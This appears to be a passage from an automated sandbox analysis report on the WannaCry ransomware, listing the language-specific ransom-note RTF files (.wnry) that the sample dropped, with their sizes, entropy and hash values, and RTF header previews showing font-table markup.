Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

C:\Users\user\Desktop\msg\m_italian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	36883
Entropy (8bit):	5.028048191734335
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
MD5:	30A200F78498990095B36F574B6E8690
SHA1:	C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
SHA-256:	49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
SHA-512:	C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_japanese.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	81844
Entropy (8bit):	4.85025787009624
Encrypted:	false
SSDEEP:	384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
MD5:	B77E1221F7ECD0B5D696CB66CDA1609E
SHA1:	51EB7A254A33D05EDF188DED653005DC82DE8A46
SHA-256:	7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
SHA-512:	F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001

C:\Users\user\Desktop\msg\m_korean.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	91501
Entropy (8bit):	4.841830504507431
Encrypted:	false
SSDEEP:	768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
MD5:	6735CB43FE44832B061EEB3F5956B099
SHA1:	D636DAF64D524F81367EA92FDAFA3726C909BEE1
SHA-256:	552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
SHA-512:	60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_latvian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	41169
Entropy (8bit):	5.030695296195755
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
MD5:	C33AFB4ECC04EE1BCC6975BEA49ABE40
SHA1:	FBEA4F170507CDE02B839527EF50B7EC74B4821F
SHA-256:	A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
SHA-512:	0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_norwegian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37577
Entropy (8bit):	5.025836823617116
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
MD5:	FF70CC7C00951084175D12128CE02399
SHA1:	75AD3B1AD4FB14813882D88E952208C648F1FD18
SHA-256:	CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
SHA-512:	F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_polish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	39896
Entropy (8bit):	5.048541002474746
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
MD5:	E79D7F2833A9C2E2553C7FE04A1B63F4
SHA1:	3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
SHA-256:	519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
SHA-512:	E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_portuguese.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37917
Entropy (8bit):	5.027872281764284
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
MD5:	FA948F7D8DFB21CEDDD6794F2D56B44F
SHA1:	CA915FBE020CAA88DD776D89632D7866F660FC7A
SHA-256:	BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
SHA-512:	0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_romanian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	52161
Entropy (8bit):	4.964306949910696
Encrypted:	false
SSDEEP:	768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
MD5:	313E0ECECD24F4FA1504118A11BC7986
SHA1:	E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
SHA-256:	70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
SHA-512:	C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_russian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	47108
Entropy (8bit):	4.952777691675008
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
MD5:	452615DB2336D60AF7E2057481E4CAB5
SHA1:	442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
SHA-256:	02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
SHA-512:	7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_slovak.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	41391
Entropy (8bit):	5.027730966276624
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
MD5:	C911ABA4AB1DA6C28CF86338AB2AB6CC
SHA1:	FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
SHA-256:	E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
SHA-512:	3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_spanish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37381
Entropy (8bit):	5.02443306661187
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
MD5:	8D61648D34CBA8AE9D1E2A219019ADD1
SHA1:	2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
SHA-256:	72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
SHA-512:	68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_swedish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	38483
Entropy (8bit):	5.022972736625151
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
MD5:	C7A19984EB9F37198652EAF2FD1EE25C
SHA1:	06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
SHA-256:	146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
SHA-512:	43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_turkish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	42582
Entropy (8bit):	5.010722377068833
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
MD5:	531BA6B1A5460FC9446946F91CC8C94B
SHA1:	CC56978681BD546FD82D87926B5D9905C92A5803
SHA-256:	6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
SHA-512:	EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_vietnamese.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	93778
Entropy (8bit):	4.76206134900188
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
MD5:	8419BE28A0DCEC3F55823620922B00FA
SHA1:	2E4791F9CDFCA8ABF345D606F313D22B36C46B92
SHA-256:	1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
SHA-512:	8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
Malicious:	false
Reputation:	unknown
